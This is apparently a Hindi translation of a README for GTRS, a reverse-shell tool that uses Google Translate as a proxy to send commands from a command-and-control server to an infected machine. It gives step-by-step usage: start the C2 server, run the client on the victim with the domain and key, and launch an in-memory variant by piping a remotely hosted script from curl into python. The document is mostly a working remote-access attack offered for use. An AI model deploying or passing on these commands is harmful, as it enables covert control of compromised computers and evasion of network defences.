
GTRS - गूगल अनुवादक रिवर्स शेल
यह उपकरण Google Translator का उपयोग प्रॉक्सी के रूप में करता है ताकि संक्रमित मशीन को मनमानी कमांड भेजी जा सके।
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
पहले आपको एक VPS और एक डोमेन चाहिए, डोमेन के लिए आप Freenom पर एक मुफ्त प्राप्त कर सकते हैं।
अपने VPS पर server.py चलाएं
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
यह आपको एक गुप्त कुंजी प्रदान करेगा जो क्लाइंट पर उपयोग होगी।
क्लाइंट को उस कंप्यूटर पर चलाएं जिसके पास Google Translator तक पहुंच है, सर्वर द्वारा उत्पन्न डोमेन और गुप्त कुंजी प्रदान करते हुए।
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
अब आपके पास नामित पाइप फ़ाइलों का उपयोग करके एक इंटरैक्टिव शेल है, हाँ आप निर्देशिकाओं में cd कर सकते हैं।
आपको पहले बाइनरी को डाउनलोड करना होगा या इसे कंपाइल करना होगा, फिर प्रक्रिया बैश क्लाइंट के समान है,
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
इस क्लाइंट के साथ आप इसे लिनक्स, मैक और विंडोज पर चला सकते हैं, लेकिन क्लाइंट के पास अभी तक एक इंटरैक्टिव शेल नहीं है।
इस ब्लॉगपोस्ट को पढ़ने के बाद, मैंने GTRS को मेमोरी में निष्पादित करने के लिए एक सरल अनुकूलन किया, बस स्क्रिप्ट inmemory-linux.py में होस्ट और कुंजी संपादित करें, फिर इसे एक सर्वर पर होस्ट करें और इसे कर्ल करें।
curl https://yourserver.ml/inmemory-linux.py | python
या आप यूट्यूब दृष्टिकोण का उपयोग करके स्क्रिप्ट को होस्ट कर सकते हैं।
.bashrc जैसी बड़ी फ़ाइल नहीं पढ़ पाएंगे।डेटा भेजने के लिए User-Agent हेडर का उपयोग करके समस्या ठीक की गई।xmllint स्थापित करने की आवश्यकता है जो libxml2-utils पर है।समस्या ठीक की गई, अब क्लाइंट गो में भी लिखा गया है।